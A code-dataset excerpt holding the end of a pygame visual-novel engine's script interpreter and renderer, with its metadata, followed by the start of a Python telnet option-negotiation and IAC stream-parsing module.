Text(_font, 36, (0, 0, 0), pygame.Rect(400, 930, 1450, 140))\n self.text.set_text(\"\") #_lorem\n\n self.name = Text(_font, 36, (0, 0, 0), pygame.Rect(400, 830, 300, 50))\n\n self.resize(win_size)\n\n print()\n\n def remove_file(self, path):\n if not self.core.debug:\n os.remove(path)\n\n def act(self):\n for event in self.core.events:\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE:\n self.next = True\n elif event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n self.next = True\n\n if self.next:\n self.i, self.tabs, self.depth = self.script_analysis(self.i, self.tabs, self.depth)\n self.next = False\n\n for action in self.action_pull:\n if not action.s_make:\n self.action_pull.remove(action)\n action.make()\n\n def script_analysis(self, i, tabs, depth):\n global spr\n global recall\n\n while i < self.lines:\n line = get_line(i)\n i += 1\n if not line == \"\":\n j = i\n tail = \" \"*6\n while int(j) > 0:\n j /= 10\n tail = tail[0:-1]\n print(\"##\" + str(i-1), end=tail)\n if line[:tabs * 4] == \" \" * tabs * 4:\n print(\"|\" + str(tabs) + \"| \" + line[tabs * 4:])\n else:\n print(line + \"\\n~~ INCORRECT SYNTAX WARNING! 
IF \\\"~~ CHECK\\\" IGNORE THIS\")\n\n # can be used only on first level\n if line[:6] == \"define\":\n exec(line[7:], globals(), self.cdict)\n # self.cdict[list(self.cdict.keys())[-1]].print()\n\n # can be used only on first level\n elif line[:3] == \"var\":\n exec(line[4:], globals(), self.vdict)\n\n # can be used only on first level\n # [tabs * 4:] - important\n elif line[tabs * 4:][:5] == \"label\":\n self.ldict.update({line[6:-1]: i})\n line = get_line(i)\n while line[:4] == \" \" * 4 or not line:\n i += 1\n line = get_line(i)\n\n elif line[tabs * 4:][:4] == \"call\":\n recall.append([i, tabs, depth, False])\n i, tabs, depth = self.script_analysis(self.ldict[line[tabs * 4:][5:]], 1, depth + 1)\n\n print(\"~check\")\n print(tabs)\n print(line[:tabs * 4] != \" \" * tabs * 4, end=\"\\n\\n\")\n\n # if there is a script further\n if line[:tabs * 4] != \" \" * tabs * 4:\n break\n\n elif line[tabs * 4:][:2] == \"if\":\n other = True\n if eval(line[tabs * 4:][3:-1], globals(), self.vdict):\n recall.append([i, tabs, depth, True])\n i, tabs, depth = self.script_analysis(i, tabs + 1, depth + 1)\n\n # if there is a script further\n if line[:tabs * 4] != \" \" * tabs * 4:\n break\n else:\n # pass\n line = get_line(i)\n while line[:4] == \" \" * 4 or not line:\n i += 1\n line = get_line(i)\n\n rebreak = False\n while True:\n if get_line(i)[tabs * 4:][:4] == \"elif\":\n line = get_line(i)\n i += 1\n\n if eval(line[tabs * 4:][5:-1], globals(), self.vdict):\n recall.append([i, tabs, depth, True])\n i, tabs, depth = self.script_analysis(i, tabs + 1, depth + 1)\n\n # if there is a script further\n if line[:tabs * 4] != \" \" * tabs * 4:\n rebreak = True # todo real break\n\n other = False\n break\n else:\n # pass\n line = get_line(i)\n while line[:4] == \" \" * 4 or not line:\n i += 1\n line = get_line(i)\n else:\n break\n\n if rebreak:\n break\n\n if get_line(i)[tabs * 4:][:4] == \"else\":\n line = get_line(i)\n i += 1\n\n if other:\n recall.append([i, tabs, depth, True])\n i, tabs, depth = self.script_analysis(i, tabs + 1, depth + 1)\n\n # if there is a script further\n if line[:tabs * 4] != \" \" * tabs * 4:\n break\n else:\n # pass\n line = get_line(i)\n while line[:4] == \" \" * 4 or not line:\n i += 1\n line = get_line(i)\n\n elif line[tabs * 4:][:4] == \"elif\" or line[tabs * 4:][:4] == \"else\":\n # pass\n line = get_line(i)\n while line[:4] == \" \" * 4 or not line:\n i += 1\n line = get_line(i)\n\n elif line[tabs * 4:][:5] == \"scene\":\n print(\" \" * 8 + line[tabs * 4:][6:] + \".png\")\n bg = Sprite(crypto.decode_img(_bg + line[tabs * 4:][6:]))\n self.remove_file(_scene + line[tabs * 4:][6:] + \".png\")\n bg.scale(1920, 1080)\n bg.set_center(1920 / 2, 1080 / 2)\n\n line = get_line(i)\n i += 1\n if line[tabs * 4:][:4] == \"with\":\n if line[tabs * 4:][5:9] == \"fade\":\n self.action_pull.append(Fade(self.group, float(line[tabs * 4:][10:-1])))\n if line[tabs * 4:][5:13] == \"dissolve\":\n bg.set_alpha(0)\n self.action_pull.append(Dissolve(bg, float(line[tabs * 4:][14:-1])))\n\n # добавление должно быть после начала действия\n self.group.add(bg)\n\n elif line[tabs * 4:][:4] == \"show\":\n print(\" \" * 8 + line[tabs * 4:][5:] + \".png\")\n # print(self.group.sprites())\n\n update = False\n for key in self.cdict.keys():\n if line[tabs * 4:][5:5 + len(key)] == key:\n for spr in self.group.sprites():\n if key == spr.tag:\n spr.update_img(crypto.decode_img(_scene + key + \"/\" + line[tabs * 4:][5:]))\n self.remove_file(_scene + key + \"/\" + line[tabs * 4:][5:] + \".png\")\n update = True\n if not 
update:\n spr = Sprite(crypto.decode_img(_scene + key + \"/\" + line[tabs * 4:][5:]), key)\n self.remove_file(_scene + key + \"/\" + line[tabs * 4:][5:] + \".png\")\n spr.scale(spr.get_base_w(), spr.get_base_h())\n # spr.set_midbottom_pct(.5, 1)\n # spr.set_bottomright(1920, 1080)\n # self.spacing += .2\n # spr.zoom(1.3)\n # spr.draw_debug(True)\n self.group.add(spr)\n\n if get_line(i)[tabs * 4:][:2] == \"at\":\n line = get_line(i)\n i += 1\n if line[tabs * 4:][3:] == \"left\":\n spr.set_bottomleft(0, 1080)\n elif line[tabs * 4:][3:] == \"right\":\n spr.set_bottomright(1920, 1080)\n else:\n spr.set_midbottom_pct(float(line[tabs * 4:][3:]), 1)\n else:\n spr.set_midbottom_pct(.5, 1)\n\n if get_line(i)[tabs * 4:][:4] == \"zoom\":\n line = get_line(i)\n i += 1\n # spr.zoom(line[5:])\n spr.zoom(float(line[tabs * 4:][5:]))\n break\n\n if get_line(i)[tabs * 4:][:4] == \"with\":\n line = get_line(i)\n i += 1\n if line[tabs * 4:][5:13] == \"dissolve\":\n spr.set_alpha(0)\n self.action_pull.append(Dissolve(spr, float(line[tabs * 4:][14:-1])))\n\n elif line[tabs * 4:][:9] == \"translate\":\n print(\" \" * 8 + str(self.cdict.keys()))\n for key in self.cdict.keys():\n if line[tabs * 4:][10:10 + len(key)] == key:\n for spr in self.group.sprites():\n if key == spr.tag:\n trans_dict = literal_eval(line[tabs * 4:][11 + len(key):])\n self.action_pull.append(Translate(spr, trans_dict[\"x\"], trans_dict[\"t\"]))\n\n elif line[tabs * 4:][:4] == \"hide\":\n for key in self.cdict.keys():\n if line[tabs * 4:][5:5 + len(key)] == key:\n for spr in self.group.sprites():\n if key == spr.tag:\n line = get_line(i)\n i += 1\n if line[tabs * 4:][:4] == \"with\":\n if line[tabs * 4:][5:13] == \"dissolve\":\n self.action_pull.append(Dissolve(spr, float(line[tabs * 4:][14:-1])))\n else:\n spr.kill()\n del spr\n # TODO real delete\n break\n\n elif line[tabs * 4:][:4] == \"play\":\n if line[tabs * 4:][5:10] == \"music\":\n path = crypto.decode_music(_music + line[tabs * 4:][11:])\n pygame.mixer.init(frequency=mutagen.mp3.MP3(path).info.sample_rate)\n self.remove_file(_music + line[tabs * 4:][11:] + \".mp3\")\n print(\" \" * 8 + str(mutagen.mp3.MP3(path).info.sample_rate))\n pygame.mixer.music.load(path)\n pygame.mixer.music.set_volume(.35)\n pygame.mixer.music.play()\n if line[tabs * 4:][5:10] == \"sound\":\n pass\n\n elif line[tabs * 4:][0] == \"#\":\n pass\n\n elif line[tabs * 4:][0] == \"\\\"\":\n print(\" \" * 8 + line[tabs * 4:][1:-1])\n self.name.set_text(\"\")\n self.text.set_text(line[tabs * 4:][1:-1])\n break\n\n else:\n for key in self.cdict.keys():\n if line[tabs * 4:][:len(key)] == key:\n print(\" \" * 8 + \"(\" + self.cdict[key].get_name() + \") \" + line[tabs * 4:][len(key) + 2:-1])\n self.name.set_text(self.cdict[key].get_name())\n self.text.set_text(line[tabs * 4:][len(key) + 2:-1])\n break\n\n # vdict\n\n # skip empty lines\n n = -1\n line = get_line(i + n)\n while not line:\n n += 1\n line = get_line(i + n)\n\n print(\"check\")\n print(tabs)\n print(line[:tabs * 4] != \" \" * tabs * 4, end=\"\\n\\n\")\n if line[:tabs * 4] != \" \" * tabs * 4:\n rec = recall.pop()\n if rec[3]:\n # \"if\"\n i -= 1\n tabs = rec[1]\n depth = rec[2]\n print(\"~~ CHECK\")\n i, tabs, depth = self.script_analysis(i, tabs, depth)\n else:\n # \"label\"\n i = rec[0]\n tabs = rec[1]\n depth = rec[2]\n print(\"~~ CHECK\")\n break\n return i, tabs, depth\n\n def draw(self):\n # print(self.group.sprites())\n\n surface = pygame.Surface((1920, 1080))\n\n self.group.draw(surface)\n self.panel.draw(surface)\n self.text.draw(surface)\n 
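Every directive above is matched by slicing off the current indentation (line[tabs * 4:]) and comparing a keyword prefix; the translate arguments are parsed with ast.literal_eval, which accepts only Python literals and so, unlike the eval used for if conditions, cannot execute arbitrary code. A reduced sketch of that dispatch, with hypothetical result tuples:

from ast import literal_eval

def parse_directive(line, tabs):
    # strip the block indentation, then dispatch on the leading keyword
    body = line[tabs * 4:]
    if body.startswith('translate'):
        # e.g. body == 'translate eva {"x": 300, "t": 0.5}'
        name, args = body[10:].split(' ', 1)
        params = literal_eval(args)  # safe: literals only
        return ('translate', name, params['x'], params['t'])
    if body.startswith('hide'):
        return ('hide', body[5:])
    return ('say', body.strip('"'))

assert parse_directive('    translate eva {"x": 300, "t": 0.5}', 1) == \
    ('translate', 'eva', 300, 0.5)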
self.name.draw(surface)\n\n surface = pygame.transform.smoothscale(surface, (frame_size.w, frame_size.h))\n self.render.blit(surface, frame_size)\n\n def resize(self, new_size):\n global frame_size\n self.render = pygame.display.set_mode((new_size.w, new_size.h), pygame.RESIZABLE)\n\n # if new_size.w < new_size.h * self.bg.get_base_w() / self.bg.get_base_h():\n # self.bg.scale(int(new_size.h * self.bg.get_base_w() / self.bg.get_base_h()), new_size.h)\n # self.bg.set_topleft(int((new_size.w - self.bg.get_w()) / 2), new_size.h - self.bg.get_h())\n # else:\n # self.bg.scale(new_size.w, int(new_size.w * self.bg.get_base_h() / self.bg.get_base_w()))\n # self.bg.set_topleft(0, new_size.h - self.bg.get_h())\n\n if new_size.w <= new_size.h * 16 / 9:\n frame_size.w = new_size.w\n frame_size.h = int(new_size.w * 9 / 16)\n else:\n frame_size.w = int(new_size.h * 16 / 9)\n frame_size.h = new_size.h\n frame_size.center = (new_size.w / 2, new_size.h / 2)\n", "sub_path": "screens/game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 16922, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.rect.Rect", "line_number": 30, "usage_type": "call"}, {"api_name": "linecache.getline", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.RESIZABLE", "line_number": 43, "usage_type": "attribute"}, {"api_name": "utils.sprite.Sprite", "line_number": 62, "usage_type": "call"}, {"api_name": "utils.crypto.decode_img", "line_number": 62, "usage_type": "call"}, {"api_name": "utils.crypto", "line_number": 62, "usage_type": "name"}, {"api_name": "utils.sprite.Group", "line_number": 70, "usage_type": "call"}, {"api_name": "utils.text.Text", "line_number": 72, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.text.Text", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 75, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.KEYUP", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONUP", "line_number": 90, "usage_type": "attribute"}, {"api_name": "utils.sprite.Sprite", "line_number": 223, "usage_type": "call"}, {"api_name": "utils.crypto.decode_img", "line_number": 223, "usage_type": "call"}, {"api_name": "utils.crypto", "line_number": 223, "usage_type": "name"}, {"api_name": "utils.action.Fade", "line_number": 232, "usage_type": "call"}, {"api_name": "utils.action.Dissolve", "line_number": 235, "usage_type": "call"}, {"api_name": "utils.crypto.decode_img", "line_number": 249, "usage_type": "call"}, {"api_name": "utils.crypto", "line_number": 249, "usage_type": "name"}, {"api_name": "utils.sprite.Sprite", "line_number": 253, "usage_type": "call"}, {"api_name": "utils.crypto.decode_img", "line_number": 253, "usage_type": "call"}, {"api_name": "utils.crypto", "line_number": 253, "usage_type": "name"}, {"api_name": "utils.action.Dissolve", "line_number": 287, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 295, "usage_type": "call"}, {"api_name": "utils.action.Translate", "line_number": 296, "usage_type": "call"}, {"api_name": "utils.action.Dissolve", "line_number": 307, "usage_type": 
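resize() above letterboxes the fixed 1920x1080 frame into an arbitrary window: width is the limiting dimension when win_w <= win_h * 16/9, height otherwise, and the result is centered. The same arithmetic as a pure function; for a 1000x800 window the frame is 1000x562 with a 119 px top offset:

def letterbox_16x9(win_w, win_h):
    # largest centered 16:9 rect (x, y, w, h) inside the window
    if win_w <= win_h * 16 / 9:
        w, h = win_w, int(win_w * 9 / 16)   # width-limited
    else:
        w, h = int(win_h * 16 / 9), win_h   # height-limited
    return (win_w - w) // 2, (win_h - h) // 2, w, h

assert letterbox_16x9(1000, 800) == (0, 119, 1000, 562)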
"call"}, {"api_name": "utils.crypto.decode_music", "line_number": 316, "usage_type": "call"}, {"api_name": "utils.crypto", "line_number": 316, "usage_type": "name"}, {"api_name": "pygame.mixer.init", "line_number": 317, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 317, "usage_type": "attribute"}, {"api_name": "mutagen.mp3.mp3.MP3", "line_number": 317, "usage_type": "call"}, {"api_name": "mutagen.mp3.mp3", "line_number": 317, "usage_type": "attribute"}, {"api_name": "mutagen.mp3", "line_number": 317, "usage_type": "name"}, {"api_name": "mutagen.mp3.mp3.MP3", "line_number": 319, "usage_type": "call"}, {"api_name": "mutagen.mp3.mp3", "line_number": 319, "usage_type": "attribute"}, {"api_name": "mutagen.mp3", "line_number": 319, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 320, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 320, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 321, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 321, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 322, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 322, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 376, "usage_type": "call"}, {"api_name": "pygame.transform.smoothscale", "line_number": 383, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 383, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 388, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 388, "usage_type": "attribute"}, {"api_name": "pygame.RESIZABLE", "line_number": 388, "usage_type": "attribute"}]} +{"seq_id": "298487020", "text": "import collections\nimport logging\n\nfrom telnetlib import LINEMODE, NAWS, NEW_ENVIRON, BINARY, SGA, ECHO, STATUS\nfrom telnetlib import TTYPE, TSPEED, LFLOW, XDISPLOC, IAC, DONT, DO, WONT\nfrom telnetlib import WILL, SE, NOP, TM, DM, BRK, IP, AO, AYT, EC, EL, EOR\nfrom telnetlib import GA, SB, LOGOUT, EXOPL, CHARSET, SNDLOC, theNULL\n\nfrom slc import SLC_NOSUPPORT, SLC_CANTCHANGE, SLC_VARIABLE, NSLC\nfrom slc import SLC_DEFAULT, SLC_FLUSHOUT, SLC_FLUSHIN, SLC_ACK\nfrom slc import SLC_SYNCH, SLC_BRK, SLC_IP, SLC_AO, SLC_AYT, SLC_EOR\nfrom slc import SLC_ABORT, SLC_EOF, SLC_SUSP, SLC_EC, SLC_EL, SLC_EW\nfrom slc import SLC_RP, SLC_LNEXT, SLC_XON, SLC_XOFF, SLC_FORW1\nfrom slc import SLC_FORW2, SLC_MCL, SLC_MCR, SLC_MCWL, SLC_MCWR, SLC_MCBOL\nfrom slc import SLC_MCEOL, SLC_INSRT, SLC_OVER, SLC_ECR, SLC_EWR, SLC_EBOL\nfrom slc import SLC_EEOL, DEFAULT_SLC_TAB, SLC_nosupport, SLC_definition\nfrom slc import _POSIX_VDISABLE, name_slc_command, Forwardmask\n\nfrom teldisp import name_unicode\n\n(EOF, SUSP, ABORT, EOR_CMD) = (\n bytes([const]) for const in range(236, 240))\n(IS, SEND, INFO) = (bytes([const]) for const in range(3))\n(LFLOW_OFF, LFLOW_ON, LFLOW_RESTART_ANY, LFLOW_RESTART_XON) = (\n bytes([const]) for const in range(4))\n(LMODE_MODE, LMODE_FORWARDMASK, LMODE_SLC) = (\n bytes([const]) for const in range(1, 4))\n(LMODE_MODE_REMOTE, LMODE_MODE_LOCAL, LMODE_MODE_TRAPSIG) = (\n bytes([const]) for const in range(3))\n(LMODE_MODE_ACK, LMODE_MODE_SOFT_TAB, LMODE_MODE_LIT_ECHO) = (\n bytes([4]), bytes([8]), bytes([16]))\n\n# see: TelnetStreamReader._default_callbacks\nDEFAULT_IAC_CALLBACKS = (\n (BRK, 'brk'), (IP, 'ip'), (AO, 'ao'), (AYT, 'ayt'), (EC, 'ec'),\n (EL, 'el'), (EOF, 'eof'), (SUSP, 'susp'), (ABORT, 'abort'),\n (NOP, 'nop'), 
(DM, 'dm'), (GA, 'ga'), (EOR_CMD, 'eor'), )\nDEFAULT_SLC_CALLBACKS = (\n (SLC_SYNCH, 'dm'), (SLC_BRK, 'brk'), (SLC_IP, 'ip'),\n (SLC_AO, 'ao'), (SLC_AYT, 'ayt'), (SLC_EOR, 'eor'),\n (SLC_ABORT, 'abort'), (SLC_EOF, 'eof'), (SLC_SUSP, 'susp'),\n (SLC_EC, 'ec'), (SLC_EL, 'el'), (SLC_EW, 'ew'), (SLC_RP, 'rp'),\n (SLC_LNEXT, 'lnext'), (SLC_XON, 'xon'), (SLC_XOFF, 'xoff'), )\nDEFAULT_EXT_CALLBACKS = (\n (TTYPE, 'ttype'), (TSPEED, 'tspeed'), (XDISPLOC, 'xdisploc'),\n (NEW_ENVIRON, 'env'), (NAWS, 'naws'), (LOGOUT, 'logout'),\n (SNDLOC, 'sndloc',) )\n\ndef escape_iac(buf):\n \"\"\" .. function:: escape_iac(buf : bytes) -> type(bytes)\n :noindex:\n\n Return byte buffer with IAC (\\xff) escaped.\n \"\"\"\n assert isinstance(buf, (bytes, bytearray)), buf\n return buf.replace(IAC, IAC + IAC)\n\nclass Option(dict):\n def __init__(self, name, log=logging):\n \"\"\" .. class:: Option(name : str, log: logging.logger)\n\n Initialize a Telnet Option database for capturing option\n negotation changes to ``log`` if enabled for debug logging.\n \"\"\"\n self.name, self.log = name, log\n dict.__init__(self)\n\n def enabled(self, key):\n \"\"\" Returns True of option is enabled.\"\"\"\n return bool(self.get(key, None) is True)\n\n def __setitem__(self, key, value):\n if value != dict.get(self, key, None):\n descr = ' + '.join([_name_command(bytes([byte]))\n for byte in key[:2]] + [repr(byte)\n for byte in key[2:]])\n self.log.debug('{}[{}] = {}'.format(self.name, descr, value))\n dict.__setitem__(self, key, value)\n __setitem__.__doc__ = dict.__setitem__.__doc__\n\n\nclass TelnetStreamReader:\n \"\"\"\n This class implements a ``feed_byte()`` method that acts as a\n Telnet Is-A-Command (IAC) interpreter. The significance of the\n last byte passed to this method is tested by class instance public\n attributes following the call. 
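escape_iac doubles every 0xFF byte so literal data can never be read as a command, and Option is a dict that logs each negotiation state change. A usage sketch (it assumes the module's private _name_command helper, referenced by Option, is defined later in this file):

from telnetlib import IAC, ECHO

payload = b'abc' + IAC + b'def'
assert escape_iac(payload) == b'abc' + IAC + IAC + b'def'
# the receiving side undoes the doubling:
assert escape_iac(payload).replace(IAC + IAC, IAC) == payload

opts = Option('local_option')  # logs 'local_option[ECHO] = True' at debug level
opts[ECHO] = True
assert opts.enabled(ECHO) and not opts.enabled(b'\x03')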
A minimal Telnet Service Protocol\n ``data_received`` method should forward each byte, or begin forwarding\n at IAC until ``is_oob`` tests ``True``, and optionally act on\n functions of ``slc_received``.\n \"\"\"\n\n #: a list of system environment variables requested by the server after\n # a client agrees to negotiate NEW_ENVIRON.\n _default_env_request = (\n \"USER HOSTNAME UID TERM COLUMNS LINES DISPLAY LANG SYSTEMTYPE \"\n \"ACCT JOB PRINTER SFUTLNTVER SFUTLNTMODE LC_ALL VISUAL EDITOR \"\n \"LC_COLLATE LC_CTYPE LC_MESSAGES LC_MONETARY LC_NUMERIC LC_TIME\"\n ).split()\n #: Maximum size of sub-negotiation buffer\n SB_MAXSIZE = 2048\n #: Maximum size of Special Linemode Character receive buffer\n SLC_MAXSIZE = 6 * NSLC\n\n @property\n def is_linemode(self):\n \"\"\" If telnet stream appears to be in any linemode, remote or local.\n \"\"\"\n # The default Network Terminal is always in linemode, unless\n # explicitly set False (client sends: WONT, LINEMODE),\n # or implied by server (server sends: WILL ECHO, WILL SGA).\n if self.is_server:\n return self.remote_option.enabled(LINEMODE) or not (\n self.local_option.enabled(ECHO) and\n self.local_option.enabled(SGA))\n # same heuristic is reversed for client point of view (unveried XXX)\n return self.local_option.enabled(LINEMODE) or (\n self.remote_option.enabled(ECHO) and\n self.remote_option.enabled(SGA))\n\n @property\n def linemode(self):\n \"\"\" Linemode instance for stream, or None if stream is in Kludge mode.\n \"\"\"\n # A description of the linemode entered may be tested using boolean\n # instance attributes ``edit``, ``trapsig``, ``soft_tab``, and\n # ``lit_echo``, or simply its __str__() method.\n return (self._linemode if self.is_linemode else None)\n\n @property\n def is_server(self):\n \"\"\" Telnet stream is used for server end. \"\"\"\n return bool(self._server)\n\n @property\n def is_client(self):\n \"\"\" Telnet stream is used for client end.\n \"\"\"\n return bool(not self._server)\n\n @property\n def is_oob(self):\n \"\"\" Last byte processed by ``feed_byte()`` should not be received\n in-band: not duplicated to the client if remote ECHO is enabled,\n and not inserted into an input buffer.\n \"\"\"\n # Values matching special linemode characters (SLC) are inband.\n # Always True if handled by IAC interpreter and any matching callbacks.\n return (self.iac_received or self.cmd_received)\n\n def __init__(self, transport, client=False, server=False, log=logging,\n default_slc_tab=DEFAULT_SLC_TAB):\n \"\"\"\n .. class::TelnetServer(transport, client=False, server=False,\n log=logging, default_slc_tag=DEFAULT_SLC_TAB)\n\n Server and Client streams negotiate about capabilities from different\n perspectives, so the mutually exclusive booleans ``client`` and\n ``server`` (default) indicates which end the protocol is attached to.\n\n Extending or changing protocol capabilities should extend, override,\n or register their own callables, for the local iac, slc, and ext\n callback handlers; mainly those beginning with ``handle``, or by\n registering using the methods beginning with ``set_callback``.\n \"\"\"\n assert not client == False or not server == False, (\n \"Arguments 'client' and 'server' are mutually exclusive\")\n self.log = log\n self.transport = transport\n #: total bytes sent to ``feed_byte()``\n self.byte_count = 0\n #: wether flow control enabled by Transmit-Off (XOFF) (defaults\n # to Ctrl-s), should re-enable Transmit-On (XON) only on receipt\n # of the XON key (Ctrl-q). 
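The server-side branch of is_linemode above encodes the classic kludge-mode convention: a server with both WILL ECHO and WILL SGA in force is in character-at-a-time mode unless the client negotiated LINEMODE. The same rule as a pure function, with a few spot checks:

def server_appears_linemode(remote_linemode, local_echo, local_sga):
    return remote_linemode or not (local_echo and local_sga)

assert server_appears_linemode(False, True, True) is False  # kludge mode
assert server_appears_linemode(True, True, True) is True    # LINEMODE wins
assert server_appears_linemode(False, True, False) is True  # NVT default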
Or, when unset, any keypress from client\n # re-enables transmission (XON).\n self.xon_any = False\n #: set ``True`` if the last byte sent to ``feed_byte()`` is the\n # beginning of an IAC command (\\xff).\n self.iac_received = False\n #: SLC function value if the last byte sent to ``feed_byte()`` is a\n # matching special line chracter value.\n self.slc_received = False\n #: SLC function values and callbacks are fired for clients in\n # Kludge mode not otherwise capable of negotiating them, providing\n # remote editing facilities for dumb clients, such as with ``nc -T``.\n self.slc_simulated = True\n #: IAC command byte value if the last byte sent to ``feed_byte()`` is\n # part of an IAC command sequence, such as *WILL* or *SB*.\n self.cmd_received = False\n #: True when Flow Control (XON) has been recv until receipt of XOFF.\n self._xmit = True\n #: Sub-negotiation buffer\n self._sb_buffer = collections.deque()\n #: SLC buffer\n self._slc_buffer = collections.deque()\n #: Represents negotiated linemode byte mask if ``is_linemode`` is True.\n self._linemode = Linemode()\n #: True if client acknowledged forwardmask\n self._forwardmask_enabled = False\n #: True if stream is operating in server mode\n self._server = (client in (None, False) or server in (None, True))\n\n self._init_options()\n self._default_callbacks()\n self._default_slc(default_slc_tab)\n\n def feed_byte(self, byte):\n \"\"\" .. method:: feed_byte(byte : bytes)\n\n Feed a single byte into Telnet option state machine.\n \"\"\"\n assert isinstance(byte, (bytes, bytearray)), byte\n assert len(byte) == 1, byte\n self.byte_count += 1\n self._dm_recv = False\n self.slc_received = False\n # list of IAC commands needing 3+ bytes\n iac_mbs = (DO, DONT, WILL, WONT, SB)\n # cmd received is toggled false, unless its a msb.\n self.cmd_received = self.cmd_received in iac_mbs and self.cmd_received\n\n if byte == IAC:\n self.iac_received = (not self.iac_received)\n if not self.iac_received and self.cmd_received == SB:\n # SB buffer recvs escaped IAC values\n self._sb_buffer.append(IAC)\n\n elif self.iac_received and not self.cmd_received:\n # parse 2nd byte of IAC, even if recv under SB\n self.cmd_received = cmd = byte\n if cmd not in iac_mbs:\n # DO, DONT, WILL, WONT are 3-byte commands and\n # SB can be of any length. 
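A usage sketch for the byte-at-a-time interpreter being defined here: feeding IAC WILL SGA the way a protocol's data_received loop would. The transport stub is an assumption, and the private initializers called by __init__ (_init_options and friends) are defined further down the file:

from telnetlib import IAC, WILL, SGA

class StubTransport:
    def write(self, data):
        print('reply:', data)  # expect IAC DO SGA (b'\xff\xfd\x03')

stream = TelnetStreamReader(StubTransport(), server=True)
for value in IAC + WILL + SGA:
    stream.feed_byte(bytes([value]))
assert stream.remote_option.enabled(SGA)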
Otherwise, this 2nd byte\n # is the final iac sequence command byte.\n assert cmd in self._iac_callback, _name_command(cmd)\n self._iac_callback[cmd](cmd)\n self.iac_received = False\n\n elif self.iac_received and self.cmd_received == SB:\n # parse 2nd byte of IAC while while already within\n # IAC SB sub-negotiation buffer, assert command is SE.\n self.cmd_received = cmd = byte\n if cmd != SE:\n self.log.warn('SB buffer interrupted by IAC {}'.format(\n _name_command(cmd)))\n self._sb_buffer.clear()\n else:\n self.log.debug('recv IAC SE')\n # sub-negotiation end (SE), fire handle_subnegotiation\n try:\n self.handle_subnegotiation(self._sb_buffer)\n finally:\n self._sb_buffer.clear()\n self.iac_received = False\n\n elif self.cmd_received == SB:\n # continue buffering of sub-negotiation command.\n self._sb_buffer.append(byte)\n assert len(self._sb_buffer) < self.SB_MAXSIZE\n\n elif self.cmd_received:\n # parse 3rd and final byte of IAC DO, DONT, WILL, WONT.\n cmd, opt = self.cmd_received, byte\n self.log.debug('recv IAC {} {}'.format(\n _name_command(cmd), _name_command(opt)))\n if cmd == DO:\n if self.handle_do(opt):\n self.local_option[opt] = True\n if self.pending_option.enabled(WILL + opt):\n self.pending_option[WILL + opt] = False\n elif cmd == DONT:\n self.handle_dont(opt)\n if self.pending_option.enabled(WILL + opt):\n self.pending_option[WILL + opt] = False\n self.local_option[opt] = False\n elif cmd == WILL:\n if not self.pending_option.enabled(DO + opt) and opt != TM:\n self.log.debug('WILL {} unsolicited'.format(\n _name_command(opt)))\n self.handle_will(opt)\n if self.pending_option.enabled(DO + opt):\n self.pending_option[DO + opt] = False\n if self.pending_option.enabled(DONT + opt):\n self.pending_option[DONT + opt] = False\n elif cmd == WONT:\n self.handle_wont(opt)\n self.pending_option[DO + opt] = False\n self.iac_received = False\n self.cmd_received = (opt, byte)\n\n elif self.pending_option.enabled(DO + TM):\n # IAC DO TM was previously sent; discard all input until\n # IAC WILL TM or IAC WONT TM is received by remote end.\n self.log.debug('discarded by timing-mark: {!r}'.format(byte))\n\n elif (not self.is_linemode and self.slc_simulated # kludge mode,\n ) or (self.remote_option.enabled(LINEMODE)\n and self.linemode.remote): # remote lm + editing,\n # 'byte' is tested for SLC characters\n (callback, slc_name, slc_def) = self._slc_snoop(byte)\n if slc_name is not None:\n self.log.debug('_slc_snoop({!r}): {}, callback is {}.'.format(\n byte, name_slc_command(slc_name),\n callback.__name__ if callback is not None else None))\n if slc_def.flushin:\n # SLC_FLUSHIN not supported, requires SYNCH (urgent TCP).\n pass\n if slc_def.flushout:\n # XXX\n # We must call transport.pause_writing, create a new send\n # buffer without incompleted IAC bytes, call\n # discard_output, write new buffer, then resume_writing\n pass\n # allow caller to know which SLC function caused linemode\n # to process, even though CR was not yet discovered.\n self.slc_received = slc_name\n if callback is not None:\n callback(slc_name)\n else:\n # standard inband data\n return\n if not self._xmit and self.xon_any and not self.is_oob:\n # any key after XOFF enables XON\n self._slc_callback[SLC_XON]()\n\n def write(self, data, oob=False):\n \"\"\" .. 
